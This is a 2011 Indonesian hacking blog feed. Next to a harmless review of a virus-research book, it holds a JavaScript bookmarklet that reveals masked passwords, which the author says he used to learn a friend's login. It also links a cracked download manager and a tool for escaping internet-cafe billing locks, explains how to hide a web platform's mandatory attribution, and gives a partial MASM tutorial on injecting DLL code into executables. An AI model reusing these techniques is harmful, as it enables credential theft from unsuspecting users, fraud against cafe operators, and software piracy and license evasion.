My Family.. My Love.. My Cats.. My God and Prophet.. Astalavista.. 0Day.. All friends who help Me a lot until this day in IRiS, LUCiFER, BlackStorm, Kocok Jaya, Ansav, <span style="color: red;"><strong>Binus<span style="color: green;">Hacker</span></strong></span>, iRC, uCF, dT, AGAiN, AiR, LZ0, FOSi, ASSiGN, DVT, 29A, TSRh, tPORT, FFF.. All Indonesia veteran haxx0r.. Underground communities.. “Knowledge is Ability, Knowledge mean Glory, Knowledge for Charity”</div></div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-46120973693857748802011-05-23T03:30:00.000+07:002011-05-23T03:30:24.678+07:00Ebook Virus Komputer<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
Berbagi mengenai VIRUS KOMPUTER, pada ebook ini akan dipaparkan secara mendetail mengenai Virus dan Anti Virus yang di bahas secara mendalam oleh seorang expert.<br />
Yuk sambil belajar bahasa inggris, silakan nikmati:<br />
This is one of the book which i read long back but it still makes one of the <strong>best and descriptive</strong> text available on Virus.<br />
.<br />
Written by the <strong>Peter Szor</strong> – the virus expert – <strong>“The Art of Computer Virus Research and Defense”</strong> presents great material for wanna be experts in <strong>Virus research.</strong><br />
.<br />
<a href="http://www.amazon.com/Art-Computer-Virus-Research-Defense/dp/0321304543/ref=pd_sim_b_9&tag=securityxcom-20" target="_blank"><img alt="" height="320" src="http://nagareshwar.securityxploded.com/images/bookofthemonth_apr2011_artof_computer_virus_research.jpg" width="250" /></a><br />
.<br />
<h4><strong>Here is the core information about the book,</strong></h4><ul><li><strong>Title: </strong>The Art of Computer Virus Research and Defense</li>
<li> <strong>Author: </strong>Peter Szor</li>
<li> <strong>Publisher:</strong> Addison-Wesley Professional</li>
<li> <strong>Hardcover:</strong> 744 pages</li>
<li> <strong>Release Date:</strong> February 13, 2005</li>
<li> <strong>Rating(Amazon):</strong> <img alt="" height="12" src="http://nagareshwar.securityxploded.com/images/5%20star%20rating.png" width="60" /></li>
</ul>.<br />
<strong>Here is the table of contents<br />
</strong><br />
<br />
<strong>Part: I Strategies of the Attacker</strong><br />
Chapter Virus 1. Introduction to the Games of Nature<br />
Chapter Virus 2. The Fascination of Malicious Code Analysis<br />
Chapter Virus 3. Malicious Code Environments<br />
Chapter Virus 4. Classification of Infection Strategies<br />
Chapter Virus 5. Classification of In-Memory Strategies<br />
Chapter Virus 6. Basic Self-Protection Strategies<br />
Chapter Virus 7. Advanced Code Evolution Techniques and Computer Virus Generator Kits<br />
Chapter Virus 8. Classification According to Payload<br />
Chapter Virus 9. Strategies of Computer Worms<br />
Chapter Virus 10. Exploits, Vulnerabilities, and Buffer Overflow Attacks<br />
<strong>Part: II Strategies of the Defender</strong><br />
Chapter Virus 11. Antivirus Defense Techniques<br />
Chapter Virus 12. Memory Scanning and Disinfection<br />
Chapter Virus 13. Worm-Blocking Techniques and Host-Based Intrusion Prevention<br />
Chapter Virus 14. Network-Level Defense Strategies<br />
Chapter Virus 15. Malicious Code Analysis Techniques<br />
Book is divided into 2 parts, first part is focusing on history, inner workings, classification of virus and second part gives you state of art techniques to defend/detect viruses. First 2 chapters goes with early story of viruses, definitions and basic analysis (more to the point). Chapter 4 & 6 are interesting – explaining how virus infects file systems/memory to put itself into action. It explains some of the core windows concepts while throwing light on PE file modification, Kernel infection etc.<br />
<br />
Next it mentions how viruses use <strong>Anti-Debugging</strong>, Encoding, Encryption, <strong>Polymorphism </strong>etc techniques to protect themselves from being detected and draws on how virus creator kits have simplified jobs of creating state of art viruses in few clicks. Chapter 9 gives special attention to worms – how they are different from Virus, the way they spread over networks & their execution etc.<br />
Second part is very interesting for those who wanna know how Anti-virus work under the hood. It explains how signature based scanning works, Dynamic Decryption, Tracing of Virus code using Emulation, Heuristic scanning methods. It also throws light on various disinfection techniques, integrity-checking methods, <strong>virtualization </strong>based virus analysis, scanning of virus code etc. Next it goes on describing virus/worm blocking or detection techniques using host/network intrusion detection systems, firewalls, honeypots, behavioral analysis techniques.<br />
On negative side, this book does not show you how to write virus/worm program for obvious reasons. The book is filled with code snippets (most of them in x86 assembly) justifying the concepts but you will be disappointed if you want to code your own virus. Also this book is little old (published in 2005) as per current trends but it still remains great book when it comes to understanding virus & worms.</div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-6149859775215365202011-05-23T03:28:00.002+07:002011-05-23T03:28:57.868+07:00Menyembunyikan Tulisan Powered by Jcow 4.2.1<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
<div> <em>Tujuan utama penulisan artikel ini semata – mata hanya untuk pembelajaran saja, tidak kurang & tidak lebih, dan tidak pula bermaksud untuk melanggar aturan licensi Jcow</em><br />
Ok. let’s begin.<br />
Setelah semalaman suntuk utak – atik source code Jcow Social Network dengan tujuan untuk menghilangkan tulisan <span style="color: blue;"><strong>Powered by Jcow 4.2.1</strong></span>, lebih tepatnya <strong>Jcow Attribution Information</strong> yang berada pada bagian “footer”, akhirnya saya temukan juga jalan keluarnya. Tidak bisa dihilangkan, lebih baik disembunyikan saja.<br />
Banyak informasi yang mengatakan jika “footer” tersebut dihilangkan maka akan ada peringatan <span style="color: blue;">Anyone who attempts to remove Jcow branding illegally, the site will be closed without warning.</span> Dan satu – satunya cara untuk menyembunyikan tulisan <strong>Powered by Jcow 4.2.1</strong> agar tidak tampak pada bagian footer adalah dengan action tag <strong>“noscript”</strong><br />
Mari kita bahas lebih dalam lagi.<br />
Action tag <strong>“noscript”</strong> yang saya maksud adalah penambahan tag dan penutup tag pada script PHP yang berada pada file <span style="color: blue;">page.tpl.php</span>, posisi tepatnya berada pada <em>./themes/default/page.tpl.php</em> di directory web anda. Silahkan anda ikuti langkah – langkah berikut :<br />
1. Login ke CPanel/ftp/FileManager web anda<br />
2. Buka folder <em>./themes/default/</em><br />
3. Cari file yang bernama <em>page.tpl.php</em> dan pilih EDIT<br />
4. Pada 5 baris terakhir cari script :<br />
<div> <strong> </strong><br />
<blockquote> <div>?php echo jcow_attribution(1);?></div></blockquote></div></div><div>5. Tambahkan tag noscript sehingga menjadi : <blockquote> <div><strong> </strong><noscript><?php echo jcow_attribution(1);?></noscript></div></blockquote><em>nb : anda bisa mengatur dimana saja posisi script di atas untuk disembunyikan agar tidak mudah terlihat ketika orang lain mengunjungi web anda dan melihat “Page Source” web anda</em><br />
</div><div>6. Save dan selanjutnya silahkan refresh homepage web Jcow Social Network milik anda. Tulisan <strong>Powered by Jcow 4.2.1</strong> yang berada pada footer otomatis akan tersembunyi alias ter-hidden</div><div>Dari penjelasan di atas dapat kita simpulkan sebagai berikut :</div><div> Tag “noscript” digunakan untuk penyediaan konten alternatif bagi pengguna yang menginginkan script dinonaktifkan pada browser mereka atau memiliki browser yang tidak mendukung client-side scripting.<br />
Unsur noscript dapat berisi semua elemen yang dapat Anda temukan di dalam elemen body dari sebuah halaman HTML biasa.<br />
Isi dalam elemen noscript hanya akan ditampilkan jika script tidak didukung, atau dinonaktifkan di browser pengguna.<br />
<span style="color: blue;">BONUS :</span><br />
Ketika orang lain melakukan “view page source” pada web Jcow Social Netwrok milik anda, pada bagian “Generator” akan tampak Meta Tag berikut :<br />
<div> <blockquote><strong> </strong><meta name=”Generator” content=”Powered by Jcow” /><br />
<div><meta name=”Generator” content=”Jcow Social Networking Software. 4.2.1″ /></div></blockquote></div></div>Solusinya anda dapat melakukan perubahan pada file <em>page.tpl.php</em><br />
Pada file yg dimaksud cari script berikut : <div> <blockquote><strong> </strong><meta name=”Generator” content=”Powered by Jcow” /><br />
<div><?php echo $auto_redirect?></div></blockquote></div>Selanjutnya anda bisa mengedit baris pertama script di atas menjadi :<br />
<blockquote> <div><strong> </strong><meta name=”Generator” content=”TERSERAH MAU TULIS APA” /></div></blockquote>dan script<br />
<blockquote> <div><strong> </strong><?php echo $auto_redirect?></div></blockquote>bisa anda hapus.<br />
<em>Bagi anda yang belum pernah dan ingin mencoba membuat Jcow Social Network, <a href="http://download.cyber4rt.com/social-network/jcow.4.2.1.zip" target="_blank" title="Download Jcow 4.2.1"><strong>silahkan download di sini</strong></a> [Attribution Removed]</em><br />
Sekian dulu artikel sederhana dari saya. lebih dan kurangnya mohon dimaafkan.<br />
Salam cyber,</div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-63006300483476376942011-05-23T03:27:00.002+07:002011-05-23T03:27:49.294+07:00Internet Download Manager 6.0* Crack + Patch<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
Internet Download Manager atau banyak orang menyebut nya dengan nama IDM , adalah perangkat lunak yang mampu mengambil / mengunduh data-data yang ada di internet . Perangkat buatan New York, Amerika ini menempati posisi teratas dalam memaksimalkan kecepatan mengunduh data. Tampilan dan grafis yang sederhana membuat IDM lebih bersahabat dengan penggunanya.<br />
IDM didukung dengan fitur resume, yaitu untuk kepentingan mengunduh ulang berkas-berkas yang sebelumnya terputus karena kehilangan koneksi internet, masalah jaringan, komputer shutdowns, atau listrik padam secara tak terduga. IDM juga memiliki fitur unduh yang cepat dengan kemampuan melakukan segmentasi berkas secara otomatis dan didukung dengan teknologi yang aman.<br />
Perangkat lunak ini memiliki kemampuan yang lebih baik daripada tool sejenis yang ada saat ini, karena fitur yang dimiliki dalam membagi data yang sedang diunduh menjadi beberapa bagian terpisah untuk kemudian disatukan kembali setelah proses mengunduh selesai. Proses ini dinamakan multipart. Akan tetapi, IDM berbeda dengan perangkat sejenisnya karena proses multipart ini dilakukan secara bersamaan dan kecepatannya hingga 500% atau lima kali lipat lebih baik sebagaimana diklaim oleh pembuat IDM ini.<br />
IDM mampu membagi sebuah berkas saat proses mengunduh berlangsung hingga menjadi tujuh sampai delapan bagian. Sebuah berkas yang diunduh dan terbagi menjadi delapan bagian selanjutnya ditangani oleh IDM yakni dengan membagi kecepatan yang sama besar per bagiannya. Namun jika bagian-bagian tadi ada yang mengalami hambatan dalam proses unduh maka kecepatan pada bagian lain akan digunakan untuk membantu bagian yang lambat tadi.<br />
Versi terbaru IDM download 5,18 menambahkan panel untuk web-pemain yang dapat digunakan untuk mengunduh flash video dari situs seperti YouTube, MySpaceTV, dan Google Video. Fitur ini juga dilengkapi oleh Vista support, YouTube grabber, dipugar scheduler, dan MMS dukungan protokol. Versi baru juga menambahkan integrasi untuk Internet Explorer dan browser berbasis Internet Explorer, didesain ulang dan, peningkatan toolbar, dan perbaikan fitur baru lainnya. (id.wikipedia.org)<br />
Jadi langsung aja deh, berikut link <strong>IDM + PATCH CRACKED:</strong><br />
<a href="http://adf.ly/313683/http://www.megaupload.com/?d=FJF73IVR" target="_blank" title="Internet Download Manager 6.05"><strong>DOWNLOAD SOFTWARE IDM DISINI</strong></a><br />
<span style="color: red;"><strong>Silakan berdownload ria dengan increase kecepatan yang tinggi</strong></span> <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> </div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-49529883312500375282011-05-23T03:26:00.000+07:002011-05-23T03:26:44.200+07:00Tips Melihat Password Bintang<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
Bosen gak ada kegiatan, kebetulan ada temen login di Laptop untuk Browsing.<br />
Pas kebetulan dia pergi sambil ninggalin password bintangnya & boom saya tau deh passwordnya. Hehehe <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> <br />
Berikut saya kasi contohnya:<br />
1. Ada seseorang yang login ke website untuk melakukan check email, login ke facebook & sebagainya. Maka akan tampak seperti contoh dibawah:<br />
<img alt="" class="aligncenter" height="414" src="http://farm6.static.flickr.com/5053/5549993421_8ed4021b70_z.jpg" title="Melihat Password Bintang" width="640" /><br />
Terlihat disana bahwa <strong>Address Barnya</strong> masih: <span style="color: red;"><strong>https://login.yahoo.com/config/login_verify2?&.src=ym </strong><span style="color: black;">& kita masih belum tahu apa sih passwordnya (Password Berbentuk Bintang: ***************). Penasaran kan?</span></span><br />
<span style="color: red;"><span style="color: black;">2. Kita lanjutkan dengan membuat kode berikut:</span></span><br />
<code><span style="color: red;">javascript:(/* BinusHacker Tutorial By UtuH */ function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwordnya adalah:\n\n" + s); else alert("Tidak ada password bintang disini.");})();</span></code><br />
Kita copy script diatas ke <strong>ADDRESS BAR</strong>, sehingga di <strong>ADDRESS BAR</strong> menjadi seperti gambar berikut:<br />
<img alt="" class="aligncenter" height="415" src="http://farm6.static.flickr.com/5263/5549993995_6e8544c3a8_z.jpg" title="Password Bintang - Muncul" width="640" /><br />
BOOOOOMMMMM, dari informasi di atas kelihatan kan bahwa:<br />
<strong>USERNAME: <span style="color: red;">BINUSHACKER</span></strong><br />
<strong>PASSWORD: <span style="color: red;">HACKERINDONESIA</span></strong><br />
Selamat, anda telah dapat melihat PASSWORD yang tersembunyi dalam BINTANG-BINTANG!<br />
Enjoy & Eat It.. <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> <br />
Silakan berkunjung & jalan-jalan ke website saya di <a href="http://adf.ly/313683/utuh" target="_blank" title="Web Pribadi Saya"><strong>SINI</strong></a><br />
<span style="color: blue;"><strong>Silakan Follow Twitter Saya:</strong></span><br />
<a href="https://twitter.com/utuhwibowo" target="_blank"><img alt="Follow Utuh Wibowo Twiiter" src="http://www.utuhwibowo.com/wp-content/uploads/2011/03/followmytwitter.jpg" /></a></div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-30871752402439752742011-05-23T03:25:00.000+07:002011-05-23T03:25:15.281+07:00Hack Client Billing Explorer<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://indonesia-blogger.com/"><img border="0" src="http://www.indonesia-blogger.com/img/indonesiablogger.jpg" /></a><br />
Hallo semuanya, bosan dengan teknik-teknik hacking yang itu-itu dan banyak bertebaran di internet? Kali ini saya akan memberikan sedikit tutorial hacking yang ringan dan insyaallah bisa diterapkan semua orang <img alt=":D" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_biggrin.gif" /> . Untuk mempelajarinya tidak sulit kok, tidak memerlukan kemampuan khusus bahkan orang awam yang baru mampir ke warnet pun bisa melakukan hal ini.<br />
Ya, mungkin Anda berfikir cara ini adalah cara bunuh diri untuk saya. Kok mau-maunya ya seorang operator warnet mengajarkan cara untuk mengakali warnetnya sendiri? Bukan tanpa alasan, saya melakukan ini karena saya sadar ilmu adalah pemberian dari Tuhan Yang maha Esa, dan dengan menyembunyikan ilmu itu berarti saya telah mengingkari nikmat dari Tuhan. Jadi semua orang di dunia ini berhak untuk mendapatkan ilmu.<br />
Langsung saja, dalam kegiatan hacking Billing Explorer Client ini saya menggunakan bantuan dari program bernama hackclient.exe yang saya temukan dari forum HNc. Karena tutorial disana kurang lengkap maka sebagai tanda balas jasa atas ilmu yang telah saya peroleh maka saya membuat tutorial sederhana ini.<br />
<img alt="" class="aligncenter" src="http://kopastuntas.files.wordpress.com/2011/05/wallpaper-billing-client.jpg?w=512&h=384" /><br />
Di warnet masuk sebagai Personal dan siapkan modal program aplikasi hackclient.exe yang dapat diperoleh dari <strong><a href="http://adf.ly/313683/http://www.4shared.com/file/Xyw_iMyz/hackclient.html" target="_blank" title="Download Tools">http://www.4shared.com/file/Xyw_iMyz/hackclient.html</a></strong><br />
<img alt="" class="aligncenter" src="http://kopastuntas.files.wordpress.com/2011/05/program-hack-billing.jpg?w=516&h=200" /><br />
Jika sudah didapat lalu jalankan aplikasinya. Maka akan muncul tampilan seperti berikut ini :<br />
<img alt="" class="aligncenter" src="http://kopastuntas.files.wordpress.com/2011/05/tampilan-utama-program-hackbilling.jpg?w=513&h=384" /><br />
Perhatikan disana ada 2 program billing client, gag usah bingung gambar yang tampil di atas adalah billing client yang palsu, sedangkan yang asli ada di bagian paling kiri, yang tampilannya paling sederhana, dan yang pada awal tadi telah Anda lihat.<br />
Ikuti petunjuk berurutan sesuai yang ada pada program billing client palsu. Jika beruntung maka Anda bisa keluar dari program billing client dan menikmati hampir semua fasilitas windows yang dikunci oleh billing client aslinya.<br />
<img alt="" class="aligncenter" src="http://kopastuntas.files.wordpress.com/2011/05/jendela-disconnect-billing.jpg?w=210&h=199" /><br />
Perhatikan bahwa cara ini tidak akan mengurangi nilai nominal yang tertera di billing server (operator) yang harus Anda bayarkan. Ada baiknya tutorial ini digunakan untuk pembelajaran bukan untuk perbuatan jahat. Kasihan operator dan pemilik warnetnya, untuk mendapat 2000 perak pun terhalang dengan ulah pemakai aplikasi ini.<br />
Silakan download toolsnya disini:<br />
<a href="http://adf.ly/313683/http://www.4shared.com/file/Xyw_iMyz/hackclient.html" target="_blank" title="Download Hack Client"><img alt="" src="http://www.binushacker.net/wp-content/uploads/download.gif" /></a><br />
Jadi gunakan dengan bijak ya ;-D<br />
Dan selamat bereksperimen</div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-29451077740323493322011-05-23T03:24:00.000+07:002011-05-23T03:24:07.721+07:00Tutorial Injeksi Executable – Splash Screen<div dir="ltr" style="text-align: left;" trbidi="on"><br />
Pernahkah Anda melihat Splash Screen bergambar pada sebuah software, entah itu software<br />
trial utilities, Game dan lainnya? Artikel ini akan menunjukkan kepada Anda bagaimana cara<br />
menyisipkan sebuah Splash Screen bergambar dengan menggunakan bitmap yang akan muncul secara<br />
otomatis setiap kali software dijalankan. Artikel ini sedikit banyak hampir sama dengan artikel<br />
sebelumnya <strong>“Tutorial Injeksi Executable – MessageBox”</strong>. Pembahasan masih dalam lingkup<br />
<strong>Portable Executable (PE)</strong>. Yang membedakan pada artikel kali ini adalah teknik pada penerapan injeksi.<br />
Sebelum membaca artikel ini Saya harap Anda mempunyai latar belakang atau dasar<br />
pemrograman bahasa C/C++/ASM, Portable Executable dan Reverse Engineering. Hal tersebut akan<br />
membantu dan mempermudah Anda untuk memahami artikel ini. Maaf, Saya sudah berusaha<br />
menyederhanakan pembahasan pada artikel ini agar bisa dipahami oleh semua orang, namun jika masih<br />
sulit dipahami Saya mohon maaf. Karena dasar ilmu Saya adalah dunia peternakan bukan komputer, jadi<br />
Saya tidak bisa menjelaskan dengan gaya bicara programmer pada umumnya.. <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> <br />
Beberapa hal yang perlu Anda persiapkan adalah :<br />
<ol><li>IID King v1.0 buatan SantMat dari tim Reverse Engineering Immortal Descendants.</li>
<li>Notepad atau teks editor yang Anda sukai.</li>
<li>Assembler (Saya menggunakan Microsoft Macro Assembler atau MASM link download silahkan cari di Google).</li>
<li>Target file executable.</li>
<li>Palmall cigarettes, a cup of coffe and Cradle of Filth-Beyond Eleventh Hour.mp3 (Anti ngantuk <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> )</li>
<li>MRHPx Splash Add, program ini mampu menyisipkan Splash Screen bitmap secara instant. Anda</li>
</ol>bisa mempergunakan program ini jika Anda bosan membaca artikel Saya.<br />
<strong>CATATAN :</strong> File target, source code dan tool telah disertakan bersama artikel ini. Jika tidak tersedia Anda<br />
bisa mendownloadnya di website Saya. Untuk mendapatkan source code yang lain, silahkan melalui<br />
kontak email Saya.<br />
<br />
<strong>Teori Yang Membosankan</strong><br />
Sedikit berbicara tentang teori. Menyisipkan sebuah kode Splash Screen seperti Dialog Window<br />
(Jendela) dan resource eksternal pada file executable bukanlah hal yang mudah, semuanya tergantung<br />
pada keahlian Reverse Engineering yang Anda miliki, karena jika terjadi kesalahan akan membuat file<br />
executable menjadi rusak. Terlebih lagi persoalan menjadi semakin rumit jika Anda menghadapi file<br />
executable yang tidak memiliki resource ataupun IMPORT API LIBRARY yang diperlukan. Karena tidak<br />
seorangpun di dunia ini yang rela menghabiskan waktunya di depan komputer melakukan puluhan<br />
proses injeksi hanya untuk membuat jendela dialog membosankan yang bernama “Splash Screen” pada<br />
sebuah file executable..:)<br />
Untuk menyisipkan sebuah file bergambar atau bitmap image sebenarnya sangat mungkin untuk<br />
diterapkan pada file Portable Executable (PE). Cara yang bisa dipergunakan salah satunya adalah dengan<br />
membuat file DLL (Dinamic Link Library) sebagai resource dari Splash Screen bitmap. Setelah proses<br />
injeksi, program akan menjalankan fungsi EXPORT LIBRARY yang terdapat pada file DLL. Meskipun hal<br />
tersebut mungkin sedikit menghabiskan waktu daripada menyisipkan sebuah kode sederhana.<br />
<br />
<strong>Step 1 : Membuat file Dynamic Link Library (DLL) dengan Assembly</strong><br />
<strong>a) The DLL</strong><br />
Fungsi DllEntryPoint adalah suatu metode masukan opsional ke dalam sebuah dynamic-link<br />
library (DLL). Jika fungsi dipergunakan, maka akan dipanggil oleh sistem saat proses dan thread<br />
diinisialisasi dan diakhiri, atau saat dipanggil ke fungsi LoadLibrary dan FreeLibrary.<br />
<span style="color: #888888;">DllEntry Proc hInst:DWord, reason:DWord, reserved1:DWord</span><br />
<span style="color: #888888;"> .If reason==DLL_PROCESS_ATTACH</span><br />
<span style="color: #888888;"> Push hInst</span><br />
<span style="color: #888888;"> Pop hInstance</span><br />
<span style="color: #888888;"> Call ShowBitMap</span><br />
<span style="color: #888888;"> .EndIf</span><br />
<span style="color: #888888;"> Mov Eax,TRUE</span><br />
<span style="color: #888888;"> Ret</span><br />
<span style="color: #888888;"> DllEntry EndP</span><br />
<strong>b) The Bitmap</strong><br />
Proses ini dipergunakan untuk menampilkan Bitmap image Splash Screen yang berada pada<br />
resource. Pada proses ini terdapat beberapa struktur yang dipergunakan antara lain :<br />
- WNDCLASSEX<br />
Import Library : -<br />
Header File : winuser.h<br />
Struktur WNDCLASSEX berisi informasi kelas window. Dipergunakan bersama fungsi<br />
RegisterClassEx dan GetClassInfoEx. Struktur WNDCLASSEX mirip dengan struktur WNDCLASS.<br />
Terdapat 2 perbedaan. WNDCLASSEX meliputi anggota cbSize, yang menetapkan struktur<br />
ukuran, dan anggota hIconSm, yang berisi handle terhadap sebuah ikon kecil yang berhubungan<br />
dengan kelas jendela.<br />
- MSG<br />
Import Library : -<br />
Header File : winuser.h<br />
Struktur MSG berisi informasi pesan dari suatu thread urutan pesan.<br />
- CreateWindowEx<br />
Import Library : user32.lib<br />
Header File : winuser.h<br />
Fungsi CreateWindowEx menciptakan suatu overlap, pop-up, atau anak jendela dengan suatu<br />
perluasan gaya. Fungsi ini identik dengan fungsi CreateWindow.<br />
<span style="color: #888888;">ShowBitMap Proc</span><br />
<span style="color: #888888;"> Local wc:WNDCLASSEX</span><br />
<span style="color: #888888;"> Local msg:MSG</span><br />
<span style="color: #888888;"> Local hwnd:HWND</span><br />
<span style="color: #888888;">Mov wc.cbSize, SizeOf WNDCLASSEX</span><br />
<span style="color: #888888;"> Mov wc.style, CS_HREDRAW Or CS_VREDRAW</span><br />
<span style="color: #888888;"> Mov wc.lpfnWndProc, Offset WndProc</span><br />
<span style="color: #888888;"> Mov wc.cbClsExtra, NULL</span><br />
<span style="color: #888888;"> Mov wc.cbWndExtra, NULL</span><br />
<span style="color: #888888;"> Push hInstance</span><br />
<span style="color: #888888;"> Pop wc.hInstance</span><br />
<span style="color: #888888;"> Mov wc.hbrBackground, COLOR_WINDOW+1</span><br />
<span style="color: #888888;"> Mov wc.lpszMenuName, NULL</span><br />
<span style="color: #888888;"> Mov wc.lpszClassName, Offset NamaKelas</span><br />
<span style="color: #888888;"> Invoke LoadIcon, NULL, IDI_APPLICATION</span><br />
<span style="color: #888888;"> Mov wc.hIcon, Eax</span><br />
<span style="color: #888888;"> Mov wc.hIconSm, 0</span><br />
<span style="color: #888888;"> Invoke LoadCursor, NULL, IDC_ARROW</span><br />
<span style="color: #888888;"> Mov wc.hCursor, Eax</span><br />
<span style="color: #888888;"> Invoke RegisterClassEx, Addr wc</span><br />
<span style="color: #888888;"> Invoke CreateWindowEx, NULL, Addr NamaKelas, NULL,\</span><br />
<span style="color: #888888;"> WS_POPUP, CW_USEDEFAULT,\</span><br />
<span style="color: #888888;"> CW_USEDEFAULT, 257, 309, NULL, NULL,\</span><br />
<span style="color: #888888;"> hInstance, NULL</span><br />
<span style="color: #888888;"> Mov hwnd, Eax</span><br />
<span style="color: #888888;"> Invoke ShowWindow, hwnd, SW_SHOWNORMAL</span><br />
<span style="color: #888888;"> .While TRUE</span><br />
<span style="color: #888888;"> Invoke GetMessage, Addr msg, NULL, 0, 0</span><br />
<span style="color: #888888;"> .Break .If (!Eax)</span><br />
<span style="color: #888888;"> Invoke TranslateMessage, Addr msg</span><br />
<span style="color: #888888;"> Invoke DispatchMessage, Addr msg</span><br />
<span style="color: #888888;"> .EndW</span><br />
<span style="color: #888888;"> Mov Eax, msg.wParam</span><br />
<span style="color: #888888;"> Ret</span><br />
<span style="color: #888888;"> ShowBitMap EndP</span><br />
<strong>c) The Window</strong><br />
Proses ini dipergunakan untuk menampilkan jendela dialog. Pada proses ini terdapat beberapa<br />
struktur yang dipergunakan antara lain :<br />
- PAINTSTRUCT<br />
Import Library : -<br />
Header File : winuser.h<br />
Struktur PAINTSTRUCT berisi informasi untuk sebuah aplikasi. Informasi ini bisa dipergunakan<br />
untuk mengecat area klien pada suatu jendela yang dimiliki oleh aplikasi.<br />
- RECT<br />
Import Library : -<br />
Header File : windef.h<br />
Struktur RECT menggambarkan kordinat sudut kiri atas dan kanan bawah sebuah segi empat.<br />
- Timer<br />
Import Library : user-defined<br />
Header File : winuser.h<br />
Fungsi TimerProc adalah suatu fungsi gambaran-aplikasi callback yang memproses pesan<br />
WM_TIMER.<br />
<span style="color: #888888;">WndProc Proc hWnd:DWord,uMsg:DWord,wParam:DWord,lParam:DWord</span><br />
<span style="color: #888888;"> Local ps:PAINTSTRUCT</span><br />
<span style="color: #888888;"> Local hdc:HDC</span><br />
<span style="color: #888888;"> Local hMemoryDC:HDC</span><br />
<span style="color: #888888;"> Local hOldBmp:DWord</span><br />
<span style="color: #888888;"> Local bitmap:BITMAP</span><br />
<span style="color: #888888;"> Local DlgHeight:DWord</span><br />
<span style="color: #888888;"> Local DlgWidth:DWord</span><br />
<span style="color: #888888;"> Local DlgRect:RECT</span><br />
<span style="color: #888888;"> Local DesktopRect:RECT</span><br />
<span style="color: #888888;">.If uMsg==WM_DESTROY</span><br />
<span style="color: #888888;"> .If PenangananBitmap!=0</span><br />
<span style="color: #888888;"> Invoke DeleteObject, PenangananBitmap</span><br />
<span style="color: #888888;"> .EndIf</span><br />
<span style="color: #888888;"> Invoke PostQuitMessage, NULL</span><br />
<span style="color: #888888;"> .ElseIf uMsg==WM_CREATE</span><br />
<span style="color: #888888;"> Invoke GetWindowRect, hWnd, Addr DlgRect</span><br />
<span style="color: #888888;"> Invoke GetDesktopWindow</span><br />
<span style="color: #888888;"> Mov Ecx, Eax</span><br />
<span style="color: #888888;"> Invoke GetWindowRect, Ecx, Addr DesktopRect</span><br />
<span style="color: #888888;"> Push 0</span><br />
<span style="color: #888888;"> Mov Eax, DlgRect.bottom</span><br />
<span style="color: #888888;"> Sub Eax, DlgRect.top</span><br />
<span style="color: #888888;"> Mov DlgHeight, Eax</span><br />
<span style="color: #888888;"> Push Eax</span><br />
<span style="color: #888888;"> Mov Eax, DlgRect.right</span><br />
<span style="color: #888888;"> Sub Eax, DlgRect.left</span><br />
<span style="color: #888888;"> Mov DlgWidth, Eax</span><br />
<span style="color: #888888;"> Push Eax</span><br />
<span style="color: #888888;"> Mov Eax, DesktopRect.bottom</span><br />
<span style="color: #888888;"> Sub Eax, DlgHeight</span><br />
<span style="color: #888888;"> Shr Eax, 1</span><br />
<span style="color: #888888;"> Push Eax</span><br />
<span style="color: #888888;"> Mov Eax, DesktopRect.right</span><br />
<span style="color: #888888;"> Sub Eax, DlgWidth</span><br />
<span style="color: #888888;"> Shr Eax, 1</span><br />
<span style="color: #888888;"> Push Eax</span><br />
<span style="color: #888888;"> Push hWnd</span><br />
<span style="color: #888888;"> Call MoveWindow</span><br />
<span style="color: #888888;"> Invoke LoadBitmap, hInstance, Addr NamaBitmap</span><br />
<span style="color: #888888;"> Mov PenangananBitmap, Eax</span><br />
<span style="color: #888888;"> Invoke SetTimer, hWnd, 1, 5000, NULL</span><br />
<span style="color: #888888;"> Mov Timernya,Eax</span><br />
<span style="color: #888888;"> .ElseIf uMsg==WM_TIMER</span><br />
<span style="color: #888888;"> Invoke SendMessage, hWnd, WM_LBUTTONDOWN, NULL, NULL</span><br />
<span style="color: #888888;"> Invoke KillTimer, hWnd, Timernya</span><br />
<span style="color: #888888;"> .ElseIf uMsg==WM_PAINT</span><br />
<span style="color: #888888;"> Invoke BeginPaint, hWnd, Addr ps</span><br />
<span style="color: #888888;"> Mov hdc, Eax</span><br />
<span style="color: #888888;"> Invoke CreateCompatibleDC, hdc</span><br />
<span style="color: #888888;"> Mov hMemoryDC, Eax</span><br />
